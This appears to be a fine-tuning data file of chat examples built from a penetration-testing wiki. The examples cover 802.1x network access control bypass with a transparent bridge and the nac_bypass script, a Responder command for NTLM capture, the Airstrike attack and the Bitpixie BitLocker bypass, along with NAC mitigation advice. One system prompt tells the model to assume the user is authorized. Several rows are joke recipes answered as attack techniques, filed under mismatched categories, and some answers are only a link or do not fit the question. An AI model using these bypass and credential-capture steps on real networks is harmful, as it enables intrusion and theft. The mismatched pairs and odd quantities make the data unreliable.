addresses.png>)\n\n* run other offensive tools for NTLM capture, relay, etc.\n\n> [!TIP]\n> Responder needs to bet set up to listen on the bridge interface, but change the answering IP address to the one of the victim.\n> \n> ``bash\n> responder --interface br0 --externalip $VICTIM\n> ``", "metadata": {"corpus_index": 1618, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Network Access Control - Using a transparent bridge"}, {"role": "assistant", "content": "This idea involves a device that - simply spoken - in a first instance just lets all the traffic traverse it by means of forwarding rules, being totally transparent to the network and all the participants. It then does some tcpdump magic to sniff traffic like ARP, NetBIOS but also Kerberos, Active Directory, web etc., extracting the needed info to spoof the victim and the networks gateway to stay under the radar. With this info the needed rules in ebtables, iptables etc. are automatically created, and will allow an attacker to interact with the network mimicking the victim.\n\nThere is an awesome tool called nac_bypass from Mick Schneider which he walks through in this blog post.\n\nThe steps are as follows:\n\n* find a target device and put the dropbox in between\n* start the nac_bypass_setup.sh script\n\n![](<./assets/nac bypass setup.png>)\n\n> [!TIP]\n> To manually specify the interfaces, one can do so with the -1 and -2 switches. By default it will treat the lower device as switch side facing, and the next one as victim facing interface.\n\n* Wait until the script gathered the MAC address of the attacked system, the IP of the attacked system and the gateway's MAC address in order to perform the attack. If all went well the following info will show up and the device should be able to talk to the network:\n\n![](<./assets/nac bypass gathered MAC addresses.png>)\n\n* run other offensive tools for NTLM capture, relay, etc.\n\n> [!TIP]\n> Responder needs to bet set up to listen on the bridge interface, but change the answering IP address to the one of the victim.\n> \n> ``bash\n> responder --interface br0 --externalip $VICTIM\n> ``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Network Access Control - Using a transparent bridge", "response": "This idea involves a device that - simply spoken - in a first instance just lets all the traffic traverse it by means of forwarding rules, being totally transparent to the network and all the participants. It then does some tcpdump magic to sniff traffic like ARP, NetBIOS but also Kerberos, Active Directory, web etc., extracting the needed info to spoof the victim and the networks gateway to stay under the radar. With this info the needed rules in ebtables, iptables etc. are automatically created, and will allow an attacker to interact with the network mimicking the victim.\n\nThere is an awesome tool called nac_bypass from Mick Schneider which he walks through in this blog post.\n\nThe steps are as follows:\n\n* find a target device and put the dropbox in between\n* start the nac_bypass_setup.sh script\n\n![](<./assets/nac bypass setup.png>)\n\n> [!TIP]\n> To manually specify the interfaces, one can do so with the -1 and -2 switches. By default it will treat the lower device as switch side facing, and the next one as victim facing interface.\n\n* Wait until the script gathered the MAC address of the attacked system, the IP of the attacked system and the gateway's MAC address in order to perform the attack. If all went well the following info will show up and the device should be able to talk to the network:\n\n![](<./assets/nac bypass gathered MAC addresses.png>)\n\n* run other offensive tools for NTLM capture, relay, etc.\n\n> [!TIP]\n> Responder needs to bet set up to listen on the bridge interface, but change the answering IP address to the one of the victim.\n> \n> ``bash\n> responder --interface br0 --externalip $VICTIM\n> ``", "metadata": {"corpus_index": 1618, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Network Access Control - Mitigation"}, {"role": "assistant", "content": "In general an 802.1x implementation will prevent employees or service providers from connecting rogue devices to the network. To a certain extend it may also block script kiddies that don't have the l33t skillz to bypass it. For more advanced adversaries, the attacks will most likely be successful.\n\nHere are some general guidelines for keeping things as secure as possible:\n\n* Separate devices that authenticate by MAC only\n* Reduce the time for re-authentication to minimize the hub attack scenario. Leaving ports open after a successful 802.1x authentication for an hour will pose a much higher risk than 5 minutes.\n* Use MACSec if possible. This will at least make it much harder for an attacker to gather the needed info to play for Man in the Middle.\n* Monitoring:\n * Uncommon link up/downs on switches\n * Speed / duplex changes\n * Changes in framesizes (e.g. Windows vs Linux)\n * Changed TTLs\n * Access to systems and services that normally don´t get accessed (firewall logs)\n * Monitor network traffic and detect attacks / unknown patterns (IDS/IPS/SIEM)\n* Unneeded ports must be disabled/disconnected.\n* Don't expose unneeded info. Stickers with IP/MAC addresses will make it much easier for an attacker. Same goes for access to IP phone or printer menus to gather network intel. Restrict them as much as possible.\n* Restrict access to the systems. If someone is not able to get in between, he can't carry out attacks.\n* Awareness: train employees to ask questions and inform people, when they see a suspicious device hanging from a printer or stuff like that."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Network Access Control - Mitigation", "response": "In general an 802.1x implementation will prevent employees or service providers from connecting rogue devices to the network. To a certain extend it may also block script kiddies that don't have the l33t skillz to bypass it. For more advanced adversaries, the attacks will most likely be successful.\n\nHere are some general guidelines for keeping things as secure as possible:\n\n* Separate devices that authenticate by MAC only\n* Reduce the time for re-authentication to minimize the hub attack scenario. Leaving ports open after a successful 802.1x authentication for an hour will pose a much higher risk than 5 minutes.\n* Use MACSec if possible. This will at least make it much harder for an attacker to gather the needed info to play for Man in the Middle.\n* Monitoring:\n * Uncommon link up/downs on switches\n * Speed / duplex changes\n * Changes in framesizes (e.g. Windows vs Linux)\n * Changed TTLs\n * Access to systems and services that normally don´t get accessed (firewall logs)\n * Monitor network traffic and detect attacks / unknown patterns (IDS/IPS/SIEM)\n* Unneeded ports must be disabled/disconnected.\n* Don't expose unneeded info. Stickers with IP/MAC addresses will make it much easier for an attacker. Same goes for access to IP phone or printer menus to gather network intel. Restrict them as much as possible.\n* Restrict access to the systems. If someone is not able to get in between, he can't carry out attacks.\n* Awareness: train employees to ask questions and inform people, when they see a suspicious device hanging from a printer or stuff like that.", "metadata": {"corpus_index": 1619, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Network Access Control - Mitigation"}, {"role": "assistant", "content": "In general an 802.1x implementation will prevent employees or service providers from connecting rogue devices to the network. To a certain extend it may also block script kiddies that don't have the l33t skillz to bypass it. For more advanced adversaries, the attacks will most likely be successful.\n\nHere are some general guidelines for keeping things as secure as possible:\n\n* Separate devices that authenticate by MAC only\n* Reduce the time for re-authentication to minimize the hub attack scenario. Leaving ports open after a successful 802.1x authentication for an hour will pose a much higher risk than 5 minutes.\n* Use MACSec if possible. This will at least make it much harder for an attacker to gather the needed info to play for Man in the Middle.\n* Monitoring:\n * Uncommon link up/downs on switches\n * Speed / duplex changes\n * Changes in framesizes (e.g. Windows vs Linux)\n * Changed TTLs\n * Access to systems and services that normally don´t get accessed (firewall logs)\n * Monitor network traffic and detect attacks / unknown patterns (IDS/IPS/SIEM)\n* Unneeded ports must be disabled/disconnected.\n* Don't expose unneeded info. Stickers with IP/MAC addresses will make it much easier for an attacker. Same goes for access to IP phone or printer menus to gather network intel. Restrict them as much as possible.\n* Restrict access to the systems. If someone is not able to get in between, he can't carry out attacks.\n* Awareness: train employees to ask questions and inform people, when they see a suspicious device hanging from a printer or stuff like that."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Network Access Control - Mitigation", "response": "In general an 802.1x implementation will prevent employees or service providers from connecting rogue devices to the network. To a certain extend it may also block script kiddies that don't have the l33t skillz to bypass it. For more advanced adversaries, the attacks will most likely be successful.\n\nHere are some general guidelines for keeping things as secure as possible:\n\n* Separate devices that authenticate by MAC only\n* Reduce the time for re-authentication to minimize the hub attack scenario. Leaving ports open after a successful 802.1x authentication for an hour will pose a much higher risk than 5 minutes.\n* Use MACSec if possible. This will at least make it much harder for an attacker to gather the needed info to play for Man in the Middle.\n* Monitoring:\n * Uncommon link up/downs on switches\n * Speed / duplex changes\n * Changes in framesizes (e.g. Windows vs Linux)\n * Changed TTLs\n * Access to systems and services that normally don´t get accessed (firewall logs)\n * Monitor network traffic and detect attacks / unknown patterns (IDS/IPS/SIEM)\n* Unneeded ports must be disabled/disconnected.\n* Don't expose unneeded info. Stickers with IP/MAC addresses will make it much easier for an attacker. Same goes for access to IP phone or printer menus to gather network intel. Restrict them as much as possible.\n* Restrict access to the systems. If someone is not able to get in between, he can't carry out attacks.\n* Awareness: train employees to ask questions and inform people, when they see a suspicious device hanging from a printer or stuff like that.", "metadata": {"corpus_index": 1619, "category": "web", "source_file": "docs/src/physical/networking/network-access-control.md", "page_title": "Network Access Control", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Airstrike attack"}, {"role": "assistant", "content": "https://shenaniganslabs.io/2021/04/13/Airstrike.html"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Airstrike attack", "response": "https://shenaniganslabs.io/2021/04/13/Airstrike.html", "metadata": {"corpus_index": 1620, "category": "web", "source_file": "docs/src/physical/physical-access/airstrike-attack.md", "page_title": "Airstrike attack", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Airstrike attack?"}, {"role": "assistant", "content": "https://shenaniganslabs.io/2021/04/13/Airstrike.html"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Airstrike attack?", "response": "https://shenaniganslabs.io/2021/04/13/Airstrike.html", "metadata": {"corpus_index": 1620, "category": "web", "source_file": "docs/src/physical/physical-access/airstrike-attack.md", "page_title": "Airstrike attack", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Encryption - Bitpixie"}, {"role": "assistant", "content": "To bypass BitLocker, a proof-of-concept can be used called 'bitpixie': https://github.com/andigandhi/bitpixie.\nThe requirements for this attack are:\n- It must use BitLocker without pre-boot authentication.\n- It must be able to boot in PXE mode. Ideally, the PXE boot option is not disabled in the bios. On some systems, this attack may work even if PXE boot is disabled, as PXE boot can be enabled by connecting an external network card.\n- The PCR Validation must not include 4. Check with manage-bde -protectors -get c: This is default behaviour."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Encryption - Bitpixie", "response": "To bypass BitLocker, a proof-of-concept can be used called 'bitpixie': https://github.com/andigandhi/bitpixie.\nThe requirements for this attack are:\n- It must use BitLocker without pre-boot authentication.\n- It must be able to boot in PXE mode. Ideally, the PXE boot option is not disabled in the bios. On some systems, this attack may work even if PXE boot is disabled, as PXE boot can be enabled by connecting an external network card.\n- The PCR Validation must not include 4. Check with manage-bde -protectors -get c: This is default behaviour.", "metadata": {"corpus_index": 1621, "category": "web", "source_file": "docs/src/physical/physical-access/encryption.md", "page_title": "Encryption", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Encryption - Bitpixie"}, {"role": "assistant", "content": "To bypass BitLocker, a proof-of-concept can be used called 'bitpixie': https://github.com/andigandhi/bitpixie.\nThe requirements for this attack are:\n- It must use BitLocker without pre-boot authentication.\n- It must be able to boot in PXE mode. Ideally, the PXE boot option is not disabled in the bios. On some systems, this attack may work even if PXE boot is disabled, as PXE boot can be enabled by connecting an external network card.\n- The PCR Validation must not include 4. Check with manage-bde -protectors -get c: This is default behaviour."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Encryption - Bitpixie", "response": "To bypass BitLocker, a proof-of-concept can be used called 'bitpixie': https://github.com/andigandhi/bitpixie.\nThe requirements for this attack are:\n- It must use BitLocker without pre-boot authentication.\n- It must be able to boot in PXE mode. Ideally, the PXE boot option is not disabled in the bios. On some systems, this attack may work even if PXE boot is disabled, as PXE boot can be enabled by connecting an external network card.\n- The PCR Validation must not include 4. Check with manage-bde -protectors -get c: This is default behaviour.", "metadata": {"corpus_index": 1621, "category": "web", "source_file": "docs/src/physical/physical-access/encryption.md", "page_title": "Encryption", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🍌 Banana & chocolate cake - Theory"}, {"role": "assistant", "content": "The banana, chocolate, oatmeal and peanut butter cake is the ultimate reward after owning a system or company. Its composition features simple yet powerful elements.\n\nThe following elements are needed for this recipe to work (for 2 to 3 attackers):\n\n* 2 bananas :banana: \n* 35ml (\\~=47g) of maple syrup :maple_leaf: (or honey)\n* 20g of oatmeal \n* 40g of dark chocolate :chocolate_bar: \n* 60g of plain flour \n* a pinch of backing powder"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🍌 Banana & chocolate cake - Theory", "response": "The banana, chocolate, oatmeal and peanut butter cake is the ultimate reward after owning a system or company. Its composition features simple yet powerful elements.\n\nThe following elements are needed for this recipe to work (for 2 to 3 attackers):\n\n* 2 bananas :banana: \n* 35ml (\\~=47g) of maple syrup :maple_leaf: (or honey)\n* 20g of oatmeal \n* 40g of dark chocolate :chocolate_bar: \n* 60g of plain flour \n* a pinch of backing powder", "metadata": {"corpus_index": 1622, "category": "windows", "source_file": "docs/src/physical/super-secret-zones/banana-and-chocolate-cake.md", "page_title": "🍌 Banana & chocolate cake", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🍌 Banana & chocolate cake - Theory?"}, {"role": "assistant", "content": "The banana, chocolate, oatmeal and peanut butter cake is the ultimate reward after owning a system or company. Its composition features simple yet powerful elements.\n\nThe following elements are needed for this recipe to work (for 2 to 3 attackers):\n\n* 2 bananas :banana: \n* 35ml (\\~=47g) of maple syrup :maple_leaf: (or honey)\n* 20g of oatmeal \n* 40g of dark chocolate :chocolate_bar: \n* 60g of plain flour \n* a pinch of backing powder"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🍌 Banana & chocolate cake - Theory?", "response": "The banana, chocolate, oatmeal and peanut butter cake is the ultimate reward after owning a system or company. Its composition features simple yet powerful elements.\n\nThe following elements are needed for this recipe to work (for 2 to 3 attackers):\n\n* 2 bananas :banana: \n* 35ml (\\~=47g) of maple syrup :maple_leaf: (or honey)\n* 20g of oatmeal \n* 40g of dark chocolate :chocolate_bar: \n* 60g of plain flour \n* a pinch of backing powder", "metadata": {"corpus_index": 1622, "category": "windows", "source_file": "docs/src/physical/super-secret-zones/banana-and-chocolate-cake.md", "page_title": "🍌 Banana & chocolate cake", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🍌 Banana & chocolate cake - Practice in the context of penetration testing"}, {"role": "assistant", "content": "The cake creation can be conducted as follows:\n\n1. The bananas (2g) must be mashed and mixed with honey (35ml \\~= 47g).\n2. The plain flour (60g), oatmeal (20g) and a pinch of baking powder shall then be added to the mixture.\n3. The dark chocolate (40g) can turned into chocolate chips and be incorporated.\n4. Baking 25 minutes at 180°C will hopefully result in successful cake depending on the attacker's luck."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe 🍌 Banana & chocolate cake - Practice in the context of penetration testing", "response": "The cake creation can be conducted as follows:\n\n1. The bananas (2g) must be mashed and mixed with honey (35ml \\~= 47g).\n2. The plain flour (60g), oatmeal (20g) and a pinch of baking powder shall then be added to the mixture.\n3. The dark chocolate (40g) can turned into chocolate chips and be incorporated.\n4. Baking 25 minutes at 180°C will hopefully result in successful cake depending on the attacker's luck.", "metadata": {"corpus_index": 1623, "category": "windows", "source_file": "docs/src/physical/super-secret-zones/banana-and-chocolate-cake.md", "page_title": "🍌 Banana & chocolate cake", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🍌 Banana & chocolate cake - Practice"}, {"role": "assistant", "content": "The cake creation can be conducted as follows:\n\n1. The bananas (2g) must be mashed and mixed with honey (35ml \\~= 47g).\n2. The plain flour (60g), oatmeal (20g) and a pinch of baking powder shall then be added to the mixture.\n3. The dark chocolate (40g) can turned into chocolate chips and be incorporated.\n4. Baking 25 minutes at 180°C will hopefully result in successful cake depending on the attacker's luck."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🍌 Banana & chocolate cake - Practice", "response": "The cake creation can be conducted as follows:\n\n1. The bananas (2g) must be mashed and mixed with honey (35ml \\~= 47g).\n2. The plain flour (60g), oatmeal (20g) and a pinch of baking powder shall then be added to the mixture.\n3. The dark chocolate (40g) can turned into chocolate chips and be incorporated.\n4. Baking 25 minutes at 180°C will hopefully result in successful cake depending on the attacker's luck.", "metadata": {"corpus_index": 1623, "category": "windows", "source_file": "docs/src/physical/super-secret-zones/banana-and-chocolate-cake.md", "page_title": "🍌 Banana & chocolate cake", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🍔 Burger du seigneur - Theory work?"}, {"role": "assistant", "content": "El famoso \"Burger de seigneur\" is the ultimate meal after successfully completing an engagement. This meal was created in \"montceau-les-mines\" in 2022 by famous (not really) french head cook \"Toma\".\n\nThe requirements for this meal are as follow (for 3 attackers):\n\n* 32 slices of bacon (320 g) 🥓\n* 24 slices of cheddar 🧀\n* 6 slices of lard\n* 600 g of minced meat\n* 3 tablespoon of flour\n* 25 g of butter 🧈\n* 750 ml of semi-skimmed milk 🥛\n* 3 hamburger bun\n* 1 red onion 🧅\n* sauces (ketchup/burger/mustard)\n* 1 tomato 🍅\n* 1.6 kg of french fries 🍟\n* \"Une bonne grosse dose de talent\"\n\n> [!WARNING]\n> This meal can overflow ones calorie counter. Acquiring the necessary elements for this recipe can then be conducted by bike in order to balance all that."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🍔 Burger du seigneur - Theory work?", "response": "El famoso \"Burger de seigneur\" is the ultimate meal after successfully completing an engagement. This meal was created in \"montceau-les-mines\" in 2022 by famous (not really) french head cook \"Toma\".\n\nThe requirements for this meal are as follow (for 3 attackers):\n\n* 32 slices of bacon (320 g) 🥓\n* 24 slices of cheddar 🧀\n* 6 slices of lard\n* 600 g of minced meat\n* 3 tablespoon of flour\n* 25 g of butter 🧈\n* 750 ml of semi-skimmed milk 🥛\n* 3 hamburger bun\n* 1 red onion 🧅\n* sauces (ketchup/burger/mustard)\n* 1 tomato 🍅\n* 1.6 kg of french fries 🍟\n* \"Une bonne grosse dose de talent\"\n\n> [!WARNING]\n> This meal can overflow ones calorie counter. Acquiring the necessary elements for this recipe can then be conducted by bike in order to balance all that.", "metadata": {"corpus_index": 1624, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/burger-du-seigneur.md", "page_title": "🍔 Burger du seigneur", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🍔 Burger du seigneur - Theory?"}, {"role": "assistant", "content": "El famoso \"Burger de seigneur\" is the ultimate meal after successfully completing an engagement. This meal was created in \"montceau-les-mines\" in 2022 by famous (not really) french head cook \"Toma\".\n\nThe requirements for this meal are as follow (for 3 attackers):\n\n* 32 slices of bacon (320 g) 🥓\n* 24 slices of cheddar 🧀\n* 6 slices of lard\n* 600 g of minced meat\n* 3 tablespoon of flour\n* 25 g of butter 🧈\n* 750 ml of semi-skimmed milk 🥛\n* 3 hamburger bun\n* 1 red onion 🧅\n* sauces (ketchup/burger/mustard)\n* 1 tomato 🍅\n* 1.6 kg of french fries 🍟\n* \"Une bonne grosse dose de talent\"\n\n> [!WARNING]\n> This meal can overflow ones calorie counter. Acquiring the necessary elements for this recipe can then be conducted by bike in order to balance all that."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🍔 Burger du seigneur - Theory?", "response": "El famoso \"Burger de seigneur\" is the ultimate meal after successfully completing an engagement. This meal was created in \"montceau-les-mines\" in 2022 by famous (not really) french head cook \"Toma\".\n\nThe requirements for this meal are as follow (for 3 attackers):\n\n* 32 slices of bacon (320 g) 🥓\n* 24 slices of cheddar 🧀\n* 6 slices of lard\n* 600 g of minced meat\n* 3 tablespoon of flour\n* 25 g of butter 🧈\n* 750 ml of semi-skimmed milk 🥛\n* 3 hamburger bun\n* 1 red onion 🧅\n* sauces (ketchup/burger/mustard)\n* 1 tomato 🍅\n* 1.6 kg of french fries 🍟\n* \"Une bonne grosse dose de talent\"\n\n> [!WARNING]\n> This meal can overflow ones calorie counter. Acquiring the necessary elements for this recipe can then be conducted by bike in order to balance all that.", "metadata": {"corpus_index": 1624, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/burger-du-seigneur.md", "page_title": "🍔 Burger du seigneur", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🍔 Burger du seigneur - Bacon and french fries"}, {"role": "assistant", "content": "The oven must be preheated at 220°C. The french fries and bacon can then be cooked in it."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🍔 Burger du seigneur - Bacon and french fries", "response": "The oven must be preheated at 220°C. The french fries and bacon can then be cooked in it.", "metadata": {"corpus_index": 1625, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/burger-du-seigneur.md", "page_title": "🍔 Burger du seigneur", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🍔 Burger du seigneur - Bacon and french fries?"}, {"role": "assistant", "content": "The oven must be preheated at 220°C. The french fries and bacon can then be cooked in it."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🍔 Burger du seigneur - Bacon and french fries?", "response": "The oven must be preheated at 220°C. The french fries and bacon can then be cooked in it.", "metadata": {"corpus_index": 1625, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/burger-du-seigneur.md", "page_title": "🍔 Burger du seigneur", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🍔 Burger du seigneur - Cheddar Bechamel"}, {"role": "assistant", "content": "Melt the butter in a saucepan. Stir in the flour and cook, stirring constantly, until the paste cooks and bubbles a bit, but don't let it brown.\n\nThe milk can then be added, continuing to stir as the sauce thickens. Once all the milk has been poured, the cheddar slices can be added.\n\n> [!TIP]\n> It has to look a bit like dough"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🍔 Burger du seigneur - Cheddar Bechamel", "response": "Melt the butter in a saucepan. Stir in the flour and cook, stirring constantly, until the paste cooks and bubbles a bit, but don't let it brown.\n\nThe milk can then be added, continuing to stir as the sauce thickens. Once all the milk has been poured, the cheddar slices can be added.\n\n> [!TIP]\n> It has to look a bit like dough", "metadata": {"corpus_index": 1626, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/burger-du-seigneur.md", "page_title": "🍔 Burger du seigneur", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on 🍔 Burger du seigneur - Cheddar Bechamel"}, {"role": "assistant", "content": "Melt the butter in a saucepan. Stir in the flour and cook, stirring constantly, until the paste cooks and bubbles a bit, but don't let it brown.\n\nThe milk can then be added, continuing to stir as the sauce thickens. Once all the milk has been poured, the cheddar slices can be added.\n\n> [!TIP]\n> It has to look a bit like dough"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on 🍔 Burger du seigneur - Cheddar Bechamel", "response": "Melt the butter in a saucepan. Stir in the flour and cook, stirring constantly, until the paste cooks and bubbles a bit, but don't let it brown.\n\nThe milk can then be added, continuing to stir as the sauce thickens. Once all the milk has been poured, the cheddar slices can be added.\n\n> [!TIP]\n> It has to look a bit like dough", "metadata": {"corpus_index": 1626, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/burger-du-seigneur.md", "page_title": "🍔 Burger du seigneur", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is 🍔 Burger du seigneur - The steak?"}, {"role": "assistant", "content": "The steak can be created with one of two methods:\n\n* Classic: 200g steaks made out of mince meat\n* \"Steak du seigneur\": 200g steaks made out of a kneaded mixture (meat, ketchup, minced red onion, cayenne pepper, provencal herbs)\n\nThe steaks can be cooked in a pan along with the lard. 2 slices of cheddar should be added right before the end of the cooking."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is 🍔 Burger du seigneur - The steak?", "response": "The steak can be created with one of two methods:\n\n* Classic: 200g steaks made out of mince meat\n* \"Steak du seigneur\": 200g steaks made out of a kneaded mixture (meat, ketchup, minced red onion, cayenne pepper, provencal herbs)\n\nThe steaks can be cooked in a pan along with the lard. 2 slices of cheddar should be added right before the end of the cooking.", "metadata": {"corpus_index": 1627, "category": "active_directory", "source_file": "docs/src/physical/super-secret-zones/burger-du-seigneur.md", "page_title": "🍔 Burger du seigneur", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🍔 Burger du seigneur - The steak?"}, {"role": "assistant", "content": "The steak can be created with one of two methods:\n\n* Classic: 200g steaks made out of mince meat\n* \"Steak 